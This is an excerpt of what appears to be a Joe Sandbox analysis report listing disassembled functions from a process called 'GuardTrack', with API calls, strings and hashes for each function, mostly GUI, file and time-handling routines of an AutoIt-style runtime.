API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 23266f6715a4b4069b39b7224468344e4755c3f90480180ac72482fc6c4abb7d
Instruction ID: 16ecb19198c2e92dec780a3bd14eafb257e4c9f8da03d7ce5739af3b975a6541
Opcode Fuzzy Hash: 23266f6715a4b4069b39b7224468344e4755c3f90480180ac72482fc6c4abb7d
Instruction Fuzzy Hash: 3271AA71150200AFE725CFA8CC48FAA7BE6FB89300F04051DF98A973A1D731E951EB92

Function 0063CCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3

DragQueryPoint.SHELL32(?,?), ref: 0063CCCF

Part of subcall function 0063B1A9: ClientToScreen.USER32(?,?), ref: 0063B1D2
Part of subcall function 0063B1A9: GetWindowRect.USER32(?,?), ref: 0063B248
Part of subcall function 0063B1A9: PtInRect.USER32(?,?,0063C6BC), ref: 0063B258

SendMessageW.USER32(?,000000B0,?,?), ref: 0063CD38
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0063CD43
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0063CD66
_wcscat.LIBCMT ref: 0063CD96
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0063CDAD
SendMessageW.USER32(?,000000B0,?,?), ref: 0063CDC6
SendMessageW.USER32(?,000000B1,?,?), ref: 0063CDDD
SendMessageW.USER32(?,000000B1,?,?), ref: 0063CDFF
DragFinish.SHELL32(?), ref: 0063CE06
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0063CEF9

Strings

@GUI_DRAGFILE, xrefs: 0063CEA8
@GUI_DRAGID, xrefs: 0063CE71
@GUI_DROPID, xrefs: 0063CE26

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 3f1abf555d6f86e5a9c988a51d50376a9e330d3024ca01d5e52a8d5a9e5a95c2
Instruction ID: c6f09d994cb8d6d9e31121d201af16b8d7ada47f062f3cd383079ffe17e241f8
Opcode Fuzzy Hash: 3f1abf555d6f86e5a9c988a51d50376a9e330d3024ca01d5e52a8d5a9e5a95c2
Instruction Fuzzy Hash: FF613B71108301AFD711DF64DC89D9BBBEAFFC9750F00092DF695921A1DB70AA49CB92

Function 006182D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0061831A
VariantCopy.OLEAUT32(00000000,?), ref: 00618323
VariantClear.OLEAUT32(00000000), ref: 0061832F
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0061841D
__swprintf.LIBCMT ref: 0061844D
VarR8FromDec.OLEAUT32(?,?), ref: 00618479
VariantInit.OLEAUT32(?), ref: 0061852A
SysFreeString.OLEAUT32(?), ref: 006185BE
VariantClear.OLEAUT32(?), ref: 00618618
VariantClear.OLEAUT32(?), ref: 00618627
VariantInit.OLEAUT32(00000000), ref: 00618665

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00618447
Default, xrefs: 006184DA

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: bf7c705001947bfe3e88abc7ce6254cd83b8e5334916b66842db9cc8ab0208ba
Instruction ID: 1d5960463d53ad12dd54ca07f573a1741906a121a81e281670a41a7da8d3de73
Opcode Fuzzy Hash: bf7c705001947bfe3e88abc7ce6254cd83b8e5334916b66842db9cc8ab0208ba
Instruction Fuzzy Hash: CFD1B031604516DFDB209FA5C884BEEBBB6BF45700F2C855AE5159B281DF30EC81DBA1

Function 006349CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00634A61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00634AAC

Strings

ISCHECKED, xrefs: 00634C2F
GETTOTALCOUNT, xrefs: 00634A93
GETSELECTED, xrefs: 00634BBC
UNCHECK, xrefs: 00634C88
GETTEXT, xrefs: 00634BFF
COLLAPSE, xrefs: 00634AF2
CHECK, xrefs: 00634ACC
EXISTS, xrefs: 00634B15
SELECT, xrefs: 00634C5D
EXPAND, xrefs: 00634B5E
GETITEMCOUNT, xrefs: 00634B8E

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 4daf37c6e9a4ea374b64362edb00c102cd5aca396c2f7101ae0dcee385a014fc
Instruction ID: 8998055ed779bff2ebd22c00c32ce20ee0cff86e91f6b9773e02f437a3f6e7e9
Opcode Fuzzy Hash: 4daf37c6e9a4ea374b64362edb00c102cd5aca396c2f7101ae0dcee385a014fc
Instruction Fuzzy Hash: 42914A342047129FCB14EF64C455AAABBA2BF94354F10885DE8965B3A3CF31FD46CB86

Function 0063BE70 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0063BF26
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,006397E7), ref: 0063BF82
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0063BFBB
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0063BFFE
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0063C035
FreeLibrary.KERNEL32(?), ref: 0063C041
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0063C051
DestroyIcon.USER32(?,?,?,?,?,006397E7), ref: 0063C060
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0063C07D
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0063C089

Part of subcall function 005D312D: __wcsicmp_l.LIBCMT ref: 005D31B6

Strings

.dll, xrefs: 0063BEDF
.exe, xrefs: 0063BEBC
.icl, xrefs: 0063BE9C

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: d6b627f1db97a5f07806f01d88dddb568b76e810043a603134da8bdd5c7e1b83
Instruction ID: f24c9f61d1e882707dfab6861b89b35159961e0d34e5d8ea396c56abc0668c1f
Opcode Fuzzy Hash: d6b627f1db97a5f07806f01d88dddb568b76e810043a603134da8bdd5c7e1b83
Instruction Fuzzy Hash: D461F371500219FEEB289F64CC45FFE7BA9FB08720F10410AFA15D62C1DB75AA80DBA0

Function 0061E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0061E31F
SystemTimeToFileTime.KERNEL32(?,?), ref: 0061E32F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0061E33B
__wsplitpath.LIBCMT ref: 0061E399
_wcscat.LIBCMT ref: 0061E3B1
_wcscat.LIBCMT ref: 0061E3C3
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0061E3D8
SetCurrentDirectoryW.KERNEL32(?), ref: 0061E3EC
SetCurrentDirectoryW.KERNEL32(?), ref: 0061E41E
SetCurrentDirectoryW.KERNEL32(?), ref: 0061E43F
_wcscpy.LIBCMT ref: 0061E44B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0061E48A

Strings

*.*, xrefs: 0061E445

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 223d348d10e96aef6e8407166f226ced988195507b01773763a314746161a7c5
Instruction ID: fa4dc5204fdc13c53538c12222b3b792c07147bb1363ce46126a9a0df261a65c
Opcode Fuzzy Hash: 223d348d10e96aef6e8407166f226ced988195507b01773763a314746161a7c5
Instruction Fuzzy Hash: E5615B755046069FC710EF64C844ADEB7E9BF89310F04891EF98987251DB36EA45CB92

Function 005B23F7 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 005B1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005B2412,?,00000000,?,?,?,?,005B1AA7,00000000,?), ref: 005B1F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 005B24AF
KillTimer.USER32(-00000001,?,?,?,?,005B1AA7,00000000,?,?,005B1EBE,?,?), ref: 005B254A
DestroyAcceleratorTable.USER32(00000000), ref: 005EBFE7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005B1AA7,00000000,?,?,005B1EBE,?,?), ref: 005EC018
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005B1AA7,00000000,?,?,005B1EBE,?,?), ref: 005EC02F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005B1AA7,00000000,?,?,005B1EBE,?,?), ref: 005EC04B
DeleteObject.GDI32(00000000), ref: 005EC05D

Strings

hd, xrefs: 005B256F

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: hd
API String ID: 641708696-580410754
Opcode ID: 686345e1e0085a364e0b72158a04f0f4b24b69ba6c8e8abc0bde01dcdd64c542
Instruction ID: 88bf1809864eb64046b2e9708c68769c3d98df2d2770c730182599fdc4dbd8d2
Opcode Fuzzy Hash: 686345e1e0085a364e0b72158a04f0f4b24b69ba6c8e8abc0bde01dcdd64c542
Instruction Fuzzy Hash: A961AA31114711DFEB399F15C94CB6A7FB2FB41312F10A92CE49A4AAA0C771B891DFA1

Function 0061A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0061A2C2

Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0061A2E3
__swprintf.LIBCMT ref: 0061A33C
__swprintf.LIBCMT ref: 0061A355
_wprintf.LIBCMT ref: 0061A3FC
_wprintf.LIBCMT ref: 0061A41A

Strings

Error: , xrefs: 0061A3C4
"%s" (%d) : ==> %s:%s%s, xrefs: 0061A3F7
^ ERROR , xrefs: 0061A391
Line %d (File "%s"):, xrefs: 0061A336, 0061A34F
Incorrect parameters to object property !, xrefs: 0061A39E
"%s" (%d) : ==> %s:, xrefs: 0061A415

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 9953f0faf65748226a73f241baa17b7bf5da46c23d9c365f18af183248ff394e
Instruction ID: ceb5c0e3eb81f32f6b8d814bd5f27e10fb8f13bade781b5f7654e9a2bbb7c970
Opcode Fuzzy Hash: 9953f0faf65748226a73f241baa17b7bf5da46c23d9c365f18af183248ff394e
Instruction Fuzzy Hash: 0051D03180051AAECF14EBE0CD4AEEEBBBABF45340F100129F505B2162DB716F99DB51

Function 00610065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,005FF8B8,00000001,0000138C,00000001,00000001,00000001,?,00623FF9,00000001), ref: 0061009A
LoadStringW.USER32(00000000,?,005FF8B8,00000001), ref: 006100A3

Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77

GetModuleHandleW.KERNEL32(00000000,00677310,?,00000FFF,?,?,005FF8B8,00000001,0000138C,00000001,00000001,00000001,?,00623FF9,00000001,00000001), ref: 006100C5
LoadStringW.USER32(00000000,?,005FF8B8,00000001), ref: 006100C8
__swprintf.LIBCMT ref: 00610118
__swprintf.LIBCMT ref: 00610129
_wprintf.LIBCMT ref: 006101D2
MessageBoxW.USER32(00000000,?,?,00011010), ref: 006101E9

Strings

Line %d:, xrefs: 00610123
Error: , xrefs: 006101A0
%s (%d) : ==> %s: %s %s, xrefs: 006101CD
^ ERROR, xrefs: 0061017E
Line %d (File "%s"):, xrefs: 00610112

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 01d643d42b635811e50966e1bc3fe6569e4069f13b6d74f3cbeaff8fee97aba8
Instruction ID: 004d0e1a70c871be3b7ae5e3c6879a27f979027c0b6f9cc874edb26682afc797
Opcode Fuzzy Hash: 01d643d42b635811e50966e1bc3fe6569e4069f13b6d74f3cbeaff8fee97aba8
Instruction Fuzzy Hash: 0A41937280051AAEDF14EBE0CD4AEEE7B79FF55340F100129F505B2092DA756F49CBA5

Function 0061A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC

CharLowerBuffW.USER32(?,?), ref: 0061AA0E
GetDriveTypeW.KERNEL32 ref: 0061AA5B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0061AAA3
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0061AADA
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0061AB08

Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B

Strings

set cd door , xrefs: 0061AAA9
open, xrefs: 0061AA35
type cdaudio alias cd wait, xrefs: 0061AA86
close, xrefs: 0061AA14
wait, xrefs: 0061AAC5
open , xrefs: 0061AA6A
close cd wait, xrefs: 0061AAF3
closed, xrefs: 0061AA22, 0061AA2B

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 5a26adc579e007e0eed650f74f38a797c9904a83de1ca545d1233cccf488fd07
Instruction ID: 940f29338b87cd342a396cbbc7651b2913e8e138ad47aea81212990e93b8bf10
Opcode Fuzzy Hash: 5a26adc579e007e0eed650f74f38a797c9904a83de1ca545d1233cccf488fd07
Instruction Fuzzy Hash: EF517C711046069FC300EF60C985DAABBF6FF99358F14492DF885972A2DB31ED05CB92

Function 0061A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0061A852
__swprintf.LIBCMT ref: 0061A874
CreateDirectoryW.KERNEL32(?,00000000), ref: 0061A8B1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0061A8D6
_memset.LIBCMT ref: 0061A8F5
_wcsncpy.LIBCMT ref: 0061A931
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0061A966
CloseHandle.KERNEL32(00000000), ref: 0061A971
RemoveDirectoryW.KERNEL32(?), ref: 0061A97A
CloseHandle.KERNEL32(00000000), ref: 0061A984

Strings

:, xrefs: 0061A895
\, xrefs: 0061A88A
\??\%s, xrefs: 0061A86E

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 8680d8e2e6180b1733ebc478efe72829a20cda1d0ac60b14f23f39fdcb6cab47
Instruction ID: 21ea82aa5da48288f8ed263b8784cb2d49e19b45021a30cde0cc5f16d277bb31
Opcode Fuzzy Hash: 8680d8e2e6180b1733ebc478efe72829a20cda1d0ac60b14f23f39fdcb6cab47
Instruction Fuzzy Hash: 5E31C37551011AABDB219FE4DC48FEB77BEEF89700F1441B6F608D21A0E77097848B25

Function 0063C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0063982C,?,?), ref: 0063C0C8
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0063982C,?,?,00000000,?), ref: 0063C0DF
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0063982C,?,?,00000000,?), ref: 0063C0EA
CloseHandle.KERNEL32(00000000,?,?,?,?,0063982C,?,?,00000000,?), ref: 0063C0F7
GlobalLock.KERNEL32(00000000,?,?,?,?,0063982C,?,?,00000000,?), ref: 0063C100
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0063982C,?,?,00000000,?), ref: 0063C10F
GlobalUnlock.KERNEL32(00000000,?,?,?,?,0063982C,?,?,00000000,?), ref: 0063C118
CloseHandle.KERNEL32(00000000,?,?,?,?,0063982C,?,?,00000000,?), ref: 0063C11F
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0063982C,?,?,00000000,?), ref: 0063C130
OleLoadPicture.OLEAUT32(?,00000000,00000000,00643C7C,?), ref: 0063C149
GlobalFree.KERNEL32(00000000), ref: 0063C159
GetObjectW.GDI32(00000000,00000018,?), ref: 0063C17D
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0063C1A8
DeleteObject.GDI32(00000000), ref: 0063C1D0
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0063C1E6

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: eb2445478d9ae87c9c1c908864c439d85624a8c1e76a0f3251ec88529ce7ee95
Instruction ID: 09107184f04db1f099fbbeca8e9d82c62c90403535135d8e37355426a40d79ca
Opcode Fuzzy Hash: eb2445478d9ae87c9c1c908864c439d85624a8c1e76a0f3251ec88529ce7ee95
Instruction Fuzzy Hash: 46414C75500214EFDB219FA4DC4CEAB7BBAEF8A721F104058FA05E7260D7719941DBA0

Function 0061DEDC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0061E053
_wcscat.LIBCMT ref: 0061E06B
_wcscat.LIBCMT ref: 0061E07D
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0061E092
SetCurrentDirectoryW.KERNEL32(?), ref: 0061E0A6
GetFileAttributesW.KERNEL32(?), ref: 0061E0BE
SetFileAttributesW.KERNEL32(?,00000000), ref: 0061E0D8
SetCurrentDirectoryW.KERNEL32(?), ref: 0061E0EA

Strings

*.*, xrefs: 0061E129

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: ccc712d74aec666bf6c4a8f5649cb04d7b590c6966bc368de3115d9d29a18b41
Instruction ID: e5a78cddd380e354fdfd8af6693497efdb2ec5ad2d5bb66344510ec6ebc35a95
Opcode Fuzzy Hash: ccc712d74aec666bf6c4a8f5649cb04d7b590c6966bc368de3115d9d29a18b41
Instruction Fuzzy Hash: EF8183715042419FC724DF64C8459EAB7EABF99310F188C2EF886C7351E735EA86CB52

Function 0063C854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0063C8A4
GetFocus.USER32 ref: 0063C8B4
GetDlgCtrlID.USER32(00000000), ref: 0063C8BF
_memset.LIBCMT ref: 0063C9EA
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0063CA15
GetMenuItemCount.USER32(?), ref: 0063CA35
GetMenuItemID.USER32(?,00000000), ref: 0063CA48
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0063CA7C
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0063CAC4
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0063CAFC
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0063CB31

Strings

0, xrefs: 0063C9E2

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

